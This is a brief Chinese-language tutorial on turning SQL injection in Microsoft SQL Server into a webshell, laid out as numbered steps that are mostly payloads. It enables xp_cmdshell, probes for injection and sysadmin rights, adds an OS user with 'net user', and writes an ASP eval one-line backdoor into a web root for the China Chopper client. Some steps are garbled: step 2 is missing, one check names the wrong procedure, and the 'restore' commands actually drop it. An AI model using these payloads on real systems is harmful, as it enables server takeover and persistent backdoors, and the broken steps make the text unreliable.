mssql注入获取webshell
1、SQL Server启用xp_cmdshell组件
1.1、通过SQL语句开启,通过查询分析器,选择Master数据库,然后执行以下SQL内容(任何版本的SQL SERVER中都可以使用)
sp_configure 'show advanced options',1
reconfigure
go
sp_configure 'xp_cmdshell',1
reconfigure
go
3、判断是否有注入点
3.1、使用单引号判断是否存注入点(在第二张图中报错)说明存在注入点
3.2、使用 SQL Server数据库默认表判断,面返回正常,则说明为MsSQL注入点(and exists (select* from sysobjects))。(SQL Server数据库默认存在:sysobjects表)
4、注入点权限判断
4.1、判断当前用户的数据库操作权限,例如“sysadmin”、“db_owner”和“public”权限(and 1=(select IS_SRVROLEMEMBER('sysadmin')))
5、 检测与恢复扩展存储
5.1、可查看xp_cmdshell扩展存储过程是否被删除(and 1=(Select count(*) FROM master.dbo.sysobjects Where name = 'xp_regread'))
5.2、恢复扩展存储(;exec sp_dropextendedproc 'xp_cmdshell')
5.3、利用系统中默认的“xplog70.dll”文件,自动恢复xp_cmdshell(;exec sp_dropextendedproc ‘xp_cmdshell’ ,’xplog70.dll’)
6、添加账户
6.1、添加账户(;exec master..xp_cmdshell 'net user test test /add')
7、查看命令执行结果
7.1把连接地址下载到 “mysql.txt”文件中
8、一句话木马
8.1、写一句木马报错到“c:\wwwtest\iis-xxser.com”目录下(;exec%20master..xp_cmdshell%20'Echo%20"<%eval%20request("chopper")%>"%20>>%20c:\wwwtest\iis-xxser.com--wwwroot\muma.asp'--)
8.2、使用中国菜刀连接并查询(密码在一句话木马中有写)